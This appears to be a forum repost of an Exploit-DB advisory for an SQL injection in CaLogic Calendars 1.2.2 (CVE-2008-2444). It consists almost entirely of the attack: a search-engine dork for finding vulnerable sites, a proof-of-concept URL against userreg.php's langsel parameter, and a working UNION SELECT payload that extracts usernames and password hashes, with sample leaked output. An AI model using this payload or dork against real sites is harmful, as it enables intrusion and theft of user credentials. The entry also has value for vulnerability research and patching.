- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5607
- Проверка EDB
-
- Пройдено
- Автор
- HIS0K4
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2444
- Дата публикации
- 2008-05-13
Код:
/---------------------------------------------------------------\
\ /
/ CaLogic Calendars V1.2.2 Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : "CaLogic Calendars V1.2.2"
[*] POC : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}
[*] Example : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
[*] Note : You can see the results (user name & password) in "SQL String" line for example {SQL String: select * from clc_lang_admin:21232f297a57a5a743894a0e4a801fc3 where keyid='urth'}
----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
# milw0rm.com [2008-05-13]- Источник
- www.exploit-db.com
